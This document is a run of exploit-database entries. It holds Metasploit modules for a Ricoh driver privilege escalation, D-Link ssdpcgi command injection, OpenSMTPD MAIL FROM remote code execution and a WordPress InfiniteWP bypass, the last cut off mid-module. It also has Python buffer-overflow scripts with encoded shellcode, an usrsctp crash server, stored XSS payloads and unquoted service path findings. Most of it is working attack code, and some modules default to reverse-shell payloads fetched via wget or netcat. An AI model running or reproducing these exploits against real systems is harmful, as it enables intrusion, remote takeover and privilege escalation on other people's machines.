## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core/exploit/exe' class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File include Msf::Exploit::EXE include Msf::Post::Windows::Priv include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Ricoh Driver Privilege Escalation', 'Description' => %q( Various Ricoh printer drivers allow escalation of privileges on Windows systems. For vulnerable drivers, a low-privileged user can read/write files within the `RICOH_DRV` directory and its subdirectories. `PrintIsolationHost.exe`, a Windows process running as NT AUTHORITY\SYSTEM, loads driver-specific DLLs during the installation of a printer. A user can elevate to SYSTEM by writing a malicious DLL to the vulnerable driver directory and adding a new printer with a vulnerable driver. This module leverages the `prnmngr.vbs` script to add and delete printers. Multiple runs of this module may be required given successful exploitation is time-sensitive. ), 'License' => MSF_LICENSE, 'Author' => [ 'Alexander Pudwill', # discovery & PoC 'Pentagrid AG', # PoC 'Shelby Pace' # msf module ], 'References' => [ [ 'CVE', '2019-19363'], [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/'] ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Platform' => 'win', 'Payload' => { }, 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [[ 'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]], 'Notes' => { 'SideEffects' => [ ARTIFACTS_ON_DISK ], 'Reliability' => [ UNRELIABLE_SESSION ], 'Stability' => [ SERVICE_RESOURCE_LOSS ] }, 'DisclosureDate' => "Jan 22 2020", 'DefaultTarget' => 0 )) self.needs_cleanup = true register_advanced_options([ OptBool.new('ForceExploit', [ false, 'Override check result', false ]) ]) end def check dir_name = "C:\\ProgramData\\RICOH_DRV" return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name) driver_names = dir(dir_name) return CheckCode::Detected("Detected Ricoh driver directory, but no installed drivers") unless driver_names.length vulnerable = false driver_names.each do |driver_name| full_path = "#{dir_name}\\#{driver_name}\\_common\\dlz" next unless directory?(full_path) @driver_path = full_path res = cmd_exec("icacls \"#{@driver_path}\"") next unless res.include?('Everyone:') next unless res.match(/\(F\)/) vulnerable = true break end return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable vprint_status("Vulnerable driver directory: #{@driver_path}") CheckCode::Appears('Ricoh driver directory has full permissions') end def add_printer(driver_name) fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path) dll_data = generate_payload_dll dll_path = "#{@driver_path}\\headerfooter.dll" temp_path = expand_path('%TEMP%\\headerfooter.dll') vprint_status("Writing dll to #{temp_path}") bat_file_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(5..9)}.bat") cp_cmd = "copy /y \"#{temp_path}\" \"#{dll_path}\"" bat_file = <<~HEREDOC :repeat #{cp_cmd} && goto :repeat HEREDOC write_file(bat_file_path, bat_file) write_file(temp_path, dll_data) register_files_for_cleanup(bat_file_path, temp_path) script_cmd = "cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\"" bat_cmd = "cmd.exe /c \"#{bat_file_path}\"" print_status("Adding printer #{@printer_name}...") client.sys.process.execute(script_cmd, nil, { 'Hidden' => true }) vprint_status("Executing script...") cmd_exec(bat_cmd) rescue Rex::Post::Meterpreter::RequestError => e e_log("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") end def exploit fail_with(Failure::None, 'Already running as SYSTEM') if is_system? fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter' if sysinfo['Architecture'] != payload.arch.first fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver') end @driver_path = '' unless check == CheckCode::Appears || datastore['ForceExploit'] fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override') end @printer_name = Rex::Text.rand_text_alpha(5..9) @script_path = "C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs" drvr_name = @driver_path.split('\\') drvr_name_idx = drvr_name.index('RICOH_DRV') + 1 drvr_name = drvr_name[drvr_name_idx] add_printer(drvr_name) end def cleanup print_status("Deleting printer #{@printer_name}") Rex.sleep(3) delete_cmd = "cscript \"#{@script_path}\" -d -p \"#{@printer_name}\"" client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true }) end end

''' usersctp is SCTP library used by a variety of software including WebRTC. There is a vulnerability in the sctp_load_addresses_from_init function of usersctp that can lead to a number of out-of-bound reads. The input to sctp_load_addresses_from_init is verified by calling sctp_arethere_unrecognized_parameters, however there is a difference in how these functions handle parameter bounds. The function sctp_arethere_unrecognized_parameters does not process a parameter that is partially outside of the limit of the chunk, meanwhile, sctp_load_addresses_from_init will continue processing until a parameter that is entirely outside of the chunk occurs. This means that the last parameter of a chunk is not always verified, which can lead to parameters with very short plen values being processed by sctp_load_addresses_from_init. This can lead to out-of-bounds reads whenever the plen is subtracted from the header len. To reproduce this issue: 1) run the attached 'server', initack.py python init_ack.py 2) run the sample usersctp client ./programs/.libs/client 127.0.0.1 7 0 8888 7777 The client will crash. ''' import sys from socket import * import zlib ECHO_PORT = 7777 BUFSIZE = 1024 def getshort(arr): return ord(arr[1]) + (ord(arr[0]) << 8); def getlen(arr): return ord(arr[0]) + (ord(arr[1]) << 8); def main(): server() def print_pack(pack): o = "" for item in pack: o = o + hex(ord(item)) + " " print "PACKET SENT", o def server(): times = 0 if len(sys.argv) > 2: port = eval(sys.argv[2]) else: port = ECHO_PORT s = socket(AF_INET, SOCK_DGRAM) s.bind(('', port)) print 'udp echo server ready' while 1: data, addr = s.recvfrom(BUFSIZE) pack = "" for item in data: pack = pack + hex(ord(item)) + " " print 'server received %r from %r' % (pack, addr) vtag = data[16:20] type = ord(data[12]) length = getshort(data[14:]) port = "\x00\x07" + data[0:2] print "type", type, "len", length, "plen", len(data) ia = "\x86\x02\x01\x00\x2a\xe6\x97\x19\x00\x2c\x7c\x9f\x18\x33\x03\xc3\x07\x00\x01\x8e\x05\x00\x07\x00\x14\x0b\x36\x14\x01\x30\x2a\xe6\x97\x19\x00\x2c\x7c\x9f\xf9\x33\x05\x80\x03\x00\x01" print "vtag", hex(ord(vtag[0])), hex(ord(vtag[1])), hex(ord(vtag[2])), hex(ord(vtag[3])) o = port + "\0\0\0\0" + "\0\0\0\0" + vtag + ia[1:] crc = zlib.crc32(o) & 0xffffffff crcb= chr(crc&0xf) + chr((crc>> 8)&0xf) + chr((crc>> 16)&0xf) + chr((crc>> 24)&0xf) o = port + vtag + crcb + ia[1:] print_pack(o) s.sendto(o, addr) main()

While investigating possible shared memory issues in AGXCommandQueue::processSegmentKernelCommand(), I noticed that the size checks used to parse the IOAccelKernelCommand in IOAccelCommandQueue2::processSegmentKernelCommand() are incorrect. The IOAccelKernelCommand contains an 8-byte header consisting of a command type and size, followed by structured data specific to the type of command. When verifying that the size of the IOAccelKernelCommand has enough data for the specific command type, it appears that the check excludes the size of the 8-byte header, meaning that processSegmentKernelCommand() will parse up to 8 bytes of out-of-bounds data. Normally I wouldn't consider this very security-relevant. However, command type 2 corresponds to kIOAccelKernelCommandCollectTimeStamp, which actually *writes* into the OOB memory rather than just parsing data from it. (The IOAccelKernelCommand is being parsed from shared memory, so the write is visible to userspace.) This makes it possible to overwrite the first 1-8 bytes of the subsequent page of memory with timestamp data. The attached POC should trigger the issue on iOS 13. Tested on iPod9,1 17B111. I haven't tested on macOS, but it looks like the issue is present there as well. I'll also tack on to this issue that on the whole AGXCommandQueue seems to do a poor job of treating shared memory as volatile, and I suspect that there are further issues here that are worth looking into. For example, when IOAccelKernelCommand's type is 0x10000, AGXCommandQueue::processSegmentKernelCommand() does not use the fourth parameter (which points to the end of the IOAccelKernelCommand as parsed by IOAccelCommandQueue2::processSegmentKernelCommands()) except when passing it to IOAccelCommandQueue2::processSegmentKernelCommand(), instead double-fetching the command size from shared memory to verify that all the command data is in-bounds. Thus, I believe it's possible to make AGXCommandQueue::processSegmentKernelCommand() parse out-of-bounds data, although I have not found a way to turn this into an interesting exploitation primitive. I don't think the shared memory issues are isolated to this function either. For example, there used to be much more readily exploitable double-fetches in AGXAllocationList2::initWithSharedResourceList(), although these were fixed sometime between 16A5288q and 16G77. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48035.zip

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Udp include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi', 'Description' => %q{ D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi. }, 'Author' => [ 's1kr10s', 'secenv' ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2019-20215'], ['URL', 'https://medium.com/@s1kr10s/2e799acb8a73'] ], 'DisclosureDate' => 'Dec 24 2019', 'Privileged' => true, 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp', 'CMDSTAGER::FLAVOR' => 'wget', 'RPORT' => '1900' }, 'Targets' => [ [ 'Auto', { } ], ], 'CmdStagerFlavor' => %w{ echo wget }, 'DefaultTarget' => 0 )) register_options( [ Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']]) ]) end def exploit execute_cmdstager(linemax: 1500) end def execute_command(cmd, opts) type = datastore['VECTOR'] if type == "URN" print_status("Target Payload URN") val = "urn:device:1;`#{cmd}`" else print_status("Target Payload UUID") val = "uuid:`#{cmd}`" end connect_udp header = "M-SEARCH * HTTP/1.1\r\n" header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n" header << "ST:#{val}\r\n" header << "Man:\"ssdp:discover\"\r\n" header << "MX:2\r\n\r\n" udp_sock.put(header) disconnect_udp end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Expect def initialize(info = {}) super(update_info(info, 'Name' => 'OpenSMTPD MAIL FROM Remote Code Execution', 'Description' => %q{ This module exploits a command injection in the MAIL FROM field during SMTP interaction with OpenSMTPD to execute code as the root user. }, 'Author' => [ 'Qualys', # Discovery and PoC 'wvu', # Module 'RageLtMan <rageltman[at]sempervictus>' # Module ], 'References' => [ ['CVE', '2020-7247'], ['URL', 'https://www.openwall.com/lists/oss-security/2020/01/28/3'] ], 'DisclosureDate' => '2020-01-28', 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Privileged' => true, 'Targets' => [ ['OpenSMTPD >= commit a8e222352f', 'MyBadChars' => "!\#$%&'*?`{|}~\r\n".chars ] ], 'DefaultTarget' => 0, 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'} )) register_options([ Opt::RPORT(25), OptString.new('RCPT_TO', [true, 'Valid mail recipient', 'root']) ]) register_advanced_options([ OptBool.new('ForceExploit', [false, 'Override check result', false]), OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5]) ]) end def check connect res = sock.get_once return CheckCode::Unknown unless res return CheckCode::Detected if res =~ /^220.*OpenSMTPD/ CheckCode::Safe rescue EOFError, Rex::ConnectionError => e vprint_error(e.message) CheckCode::Unknown ensure disconnect end def exploit unless datastore['ForceExploit'] unless check == CheckCode::Detected fail_with(Failure::Unknown, 'Set ForceExploit to override') end end # We don't care who we are, so randomize it me = rand_text_alphanumeric(8..42) # Send mail to this valid recipient to = datastore['RCPT_TO'] # Comment "slide" courtesy of Qualys - brilliant! iter = rand_text_alphanumeric(15).chars.join(' ') from = ";for #{rand_text_alpha(1)} in #{iter};do read;done;sh;exit 0;" # This is just insurance, since the code was already written if from.length > 64 fail_with(Failure::BadConfig, 'MAIL FROM field is greater than 64 chars') elsif (badchars = (from.chars & target['MyBadChars'])).any? fail_with(Failure::BadConfig, "MAIL FROM field has badchars: #{badchars}") end # Create the mail body with comment slide and payload body = "\r\n" + "#\r\n" * 15 + payload.encoded sploit = { nil => /220.*OpenSMTPD/, "HELO #{me}" => /250.*pleased to meet you/, "MAIL FROM:<#{from}>" => /250.*Ok/, "RCPT TO:<#{to}>" => /250.*Recipient ok/, 'DATA' => /354 Enter mail.*itself/, body => nil, '.' => /250.*Message accepted for delivery/, 'QUIT' => /221.*Bye/ } print_status('Connecting to OpenSMTPD') connect print_status('Saying hello and sending exploit') sploit.each do |line, pattern| send_expect( line, pattern, sock: sock, timeout: datastore['ExpectTimeout'], newline: "\r\n" ) end rescue Rex::ConnectionError => e fail_with(Failure::Unreachable, e.message) rescue Timeout::Error => e fail_with(Failure::TimeoutExpired, e.message) ensure disconnect end end

# Exploit Title: CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting # Google Dork: In Shodan search engine, the filter is "CHIYU" # Date: 2020-02-11 # Exploit Author: Luca.Chiou # Vendor Homepage: https://www.chiyu-t.com.tw/en/ # Version: BF430 232/485 TCP/IP Converter all versions prior to 1.16.00 # Tested on: It is a proprietary devices: https://www.chiyu-t.com.tw/en/product/rs485-to-tcp_ip-converter_BF-430.html # CVE: CVE-2020-8839 # 1. Description: # In CHIYU BF430 web page, # user can modify the system configuration by access the /if.cgi. # Attackers can inject malicious XSS code in "TF_submask" field. # The XSS code will be stored in the database, so that causes a stored XSS vulnerability. # 2. Proof of Concept: # Access the /if.cgi of CHIYU BF430 232/485 TCP/IP Converter. # Injecting the XSS code in parameter “TF_submask”: # http://<Your Modem IP>/if.cgi?TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E ==--------------------------------------------------------------- This email contains information that is for the sole use of the intended recipient and may be confidential or privileged. If you are not the intended recipient, note that any disclosure, copying, distribution, or use of this email, or the contents of this email is prohibited. If you have received this email in error, please notify the sender of the error and delete the message. Thank you. ---------------------------------------------------------------==!!

# Exploit Title: Torrent iPod Video Converter 1.51 - Stack Overflow # Exploit Author: boku # Date: 2020-02-10 # Software Vendor: torrentrockyou # Vendor Homepage: http://www.torrentrockyou.com # Software Link: http://www.torrentrockyou.com/download/tripodconverter.exe # Version: Torrent iPod Video Converter Version 1.51 Build 115 # Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363 # Recreate: # 1) Download, install, and open Torrent iPod Video Converter # 2) run python script & open created 'poc.txt' file # 3) select-all > copy-all # 4) in app, click 'Register' on the bottom # 5) in 'Name:' textbox enter 'a' # 6) in 'Code:' textbox paste buffer # 7) click 'OK', calculator will open & app will crash # ghoul@theZiggurat# msfvenom -p windows/exec CMD=calc EXITFUNC=seh --encoder x86/alpha_upper -v shellcode -f python # x86/alpha_upper chosen with final size 447 # the decoder stubs GetPC routine includes bad characters. ESI is already at PC so no need to find it. Just remove the GetPC routine in the stub. #shellcode = b"\x89\xe7\xda\xdc\xd9\x77\xf4\x5d\x55\x59\x49" # echo -ne "\x89\xe7\xda\xdc\xd9\x77\xf4\x5d\x55\x59\x49" | ndisasm - # 89E7 mov di,sp # DADC fcmovu st4 # D977F4 fnstenv [bx-0xc] # 5D pop bp # 55 push bp # 59 pop cx # 49 dec cx shellcode = b'\x54\x5f' # push esp # pop edi shellcode += b'\x56\x59' # push esi # pop ecx shellcode += b'\x41\x90' # inc ecx # nop # Fix the offset for GetPC shellcode += b'\x90\x90\x90\x90\x90' # keep the byte length the same shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a" shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30" shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41" shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42" shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x45\x50\x35\x50" shellcode += b"\x45\x50\x35\x30\x4c\x49\x4a\x45\x50\x31\x39" shellcode += b"\x50\x33\x54\x4c\x4b\x36\x30\x30\x30\x4c\x4b" shellcode += b"\x36\x32\x54\x4c\x4c\x4b\x50\x52\x32\x34\x4c" shellcode += b"\x4b\x53\x42\x31\x38\x44\x4f\x38\x37\x50\x4a" shellcode += b"\x57\x56\x30\x31\x4b\x4f\x4e\x4c\x37\x4c\x43" shellcode += b"\x51\x43\x4c\x54\x42\x36\x4c\x57\x50\x39\x51" shellcode += b"\x48\x4f\x34\x4d\x43\x31\x49\x57\x4d\x32\x4c" shellcode += b"\x32\x36\x32\x31\x47\x4c\x4b\x56\x32\x44\x50" shellcode += b"\x4c\x4b\x51\x5a\x47\x4c\x4c\x4b\x30\x4c\x44" shellcode += b"\x51\x43\x48\x5a\x43\x57\x38\x43\x31\x48\x51" shellcode += b"\x46\x31\x4c\x4b\x31\x49\x57\x50\x35\x51\x59" shellcode += b"\x43\x4c\x4b\x30\x49\x34\x58\x4d\x33\x57\x4a" shellcode += b"\x50\x49\x4c\x4b\x36\x54\x4c\x4b\x43\x31\x58" shellcode += b"\x56\x30\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f" shellcode += b"\x54\x4d\x55\x51\x39\x57\x47\x48\x4b\x50\x54" shellcode += b"\x35\x4c\x36\x45\x53\x53\x4d\x4c\x38\x47\x4b" shellcode += b"\x43\x4d\x47\x54\x43\x45\x4d\x34\x51\x48\x4c" shellcode += b"\x4b\x50\x58\x37\x54\x43\x31\x4e\x33\x53\x56" shellcode += b"\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x30\x58\x45" shellcode += b"\x4c\x55\x51\x49\x43\x4c\x4b\x43\x34\x4c\x4b" shellcode += b"\x33\x31\x38\x50\x4d\x59\x50\x44\x57\x54\x31" shellcode += b"\x34\x51\x4b\x51\x4b\x45\x31\x30\x59\x31\x4a" shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x51" shellcode += b"\x4a\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x31\x4d" shellcode += b"\x52\x4a\x45\x51\x4c\x4d\x4d\x55\x4f\x42\x45" shellcode += b"\x50\x55\x50\x35\x50\x56\x30\x45\x38\x56\x51" shellcode += b"\x4c\x4b\x42\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f" shellcode += b"\x4b\x4b\x4e\x44\x4e\x37\x42\x4a\x4a\x45\x38" shellcode += b"\x4f\x56\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x59" shellcode += b"\x45\x37\x4c\x43\x36\x33\x4c\x34\x4a\x4d\x50" shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x35\x55\x4f\x4b\x37" shellcode += b"\x37\x34\x53\x43\x42\x42\x4f\x53\x5a\x35\x50" shellcode += b"\x56\x33\x4b\x4f\x4e\x35\x32\x43\x35\x31\x52" shellcode += b"\x4c\x52\x43\x33\x30\x41\x41" EIP_OS = '\x41'*(4136-len(shellcode)) EIP = '\x5a\x32\x4f' # 0x004f325a : call esi {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe] # ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent IPOD Video Converter\bsvideoconverter.exe) payload = shellcode + EIP_OS + EIP try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

#Exploit Title: DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow #Exploit Author : ZwX #Exploit Date: 2020-02-10 #Vendor Homepage : http://www.picture-on-tv.com/ #Tested on OS: Windows 10 v1803 #Social: twitter.com/ZwX2a ## Steps to Reproduce: ## #1. Run the python exploit script, it will create a new file with the name "key.txt". #2. Just copy the text inside "key.txt". #3. Start the program. In the new window click "Help" > "Register ... #4. Now paste the content of "key.txt" into the field: "Registration Key" > Click "Ok" #5. The calculator runs successfully #!/usr/bin/python from struct import pack buffer = "\x41" * 1608 nseh = "\xeb\x06\xff\xff" seh = pack("<I",0x10014283) #0x10014283 : pop ebx # pop ecx # ret 0x0c | {PAGE_EXECUTE_READ} [DVDPhotoData.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\DVD Photo Slideshow Professional\DVDPhotoData.dll) shellcode = "" shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29" shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca" shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca" shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2" shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17" shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59" shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1" shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf" shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82" shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5" shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4" shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20" shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d" shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee" shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9" shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a" shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d" payload = buffer + nseh + seh + shellcode try: f=open("key.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"

Exploit Title: freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path Exploit Author: boku Date: 2020-02-10 Vendor Homepage: http://www.freesshd.com Software Link: http://www.freesshd.com/freeFTPd.exe Version: 1.0.13 Tested On: Windows 10 (32-bit) C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "freeftp" | findstr /i /v """ freeFTPdService C:\Program Files\freeSSHd\freeFTPdService.exe Auto C:\Users\nightelf>sc qc freeFTPdService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: freeFTPdService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\freeSSHd\freeFTPdService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : freeFTPdService DEPENDENCIES : RPCSS SERVICE_START_NAME : LocalSystem

# Exploit Title: Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting # Google Dork: N/A # Date: 2020-02-10 # Exploit Author: Sayak Naskar # Vendor Homepage: https://vanillaforums.com/en/ # Version: 2.6.3 # Tested on: Windows, Linux # CVE : CVE-2020-8825 A Stored xss was found in Vanillaforum 2.6.3 . index.php?p=/dashboard/settings/branding # Proof of Concept: An attacker will insert a payload on branding section. So, whenever an user will open the branding section then attacker automatically get all sensitive information of the user.

Exploit Title: FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path Exploit Author: boku Date: 2020-02-10 Vendor Homepage: http://www.freesshd.com Software Link: http://www.freesshd.com/freeSSHd.exe Version: 1.3.1 Tested On: Windows 10 (32-bit) C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "freesshd" | findstr /i /v """ FreeSSHDService C:\Program Files\freeSSHd\FreeSSHDService.exe Auto C:\Users\nightelf>sc qc FreeSSHDService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: FreeSSHDService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\freeSSHd\FreeSSHDService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : FreeSSHDService DEPENDENCIES : RPCSS SERVICE_START_NAME : LocalSystem

Exploit Title: Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path Exploit Author: boku Date: 2020-02-10 Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v12.4.18.exe Version: 12.4.18 Tested On: Windows 10 (32-bit) C:\Users\elaglor>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ Sync Breeze Enterprise C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe Auto C:\Users\elaglor>sc qc "Sync Breeze Enterprise" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Sync Breeze Enterprise TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Sync Breeze Enterprise DEPENDENCIES : SERVICE_START_NAME : LocalSystem

#Exploit Title: DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow #Exploit Author : ZwX #Exploit Date: 2020-02-10 #Vendor Homepage : http://www.picture-on-tv.com/ #Tested on OS: Windows 10 v1803 #Social: twitter.com/ZwX2a ## Steps to Reproduce: ## #1. Run the python exploit script, it will create a new file with the name "name.txt". #2. Just copy the text inside "name.txt". #3. Start the program. In the new window click "Help" > "Register ... #4. Now paste the content of "name.txt" into the field: "Registration Name" > Click "Ok" #5. The calculator runs successfully #!/usr/bin/python from struct import pack buffer = "\x41" * 256 nseh = "\xeb\x06\xff\xff" seh = pack("<I",0x1004bb51) #0x1004bb51 : pop edi # pop esi # ret 0x0c | {PAGE_EXECUTE_READ} [DVDPhotoData.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\DVD Photo Slideshow Professional\DVDPhotoData.dll) long_buffer = "\x44" * 600 shellcode = "" shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29" shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca" shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca" shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2" shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17" shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59" shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1" shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf" shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82" shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5" shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4" shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20" shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d" shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee" shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9" shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a" shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d" payload = buffer + nseh + seh + shellcode + long_buffer try: f=open("name.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress InfiniteWP Client Authentication Bypass', 'Description' => %q{ This module exploits an authentication bypass in the WordPress InfiniteWP Client plugin to log in as an administrator and execute arbitrary PHP code by overwriting the file specified by PLUGIN_FILE. The module will attempt to retrieve the original PLUGIN_FILE contents and restore them after payload execution. If VerifyContents is set, which is the default setting, the module will check to see if the restored contents match the original. Note that a valid administrator username is required for this module. WordPress >= 4.9 is currently not supported due to a breaking WordPress API change. Tested against 4.8.3. }, 'Author' => [ 'WebARX', # Discovery 'wvu' # Module ], 'References' => [ ['WPVDB', '10011'], ['URL', 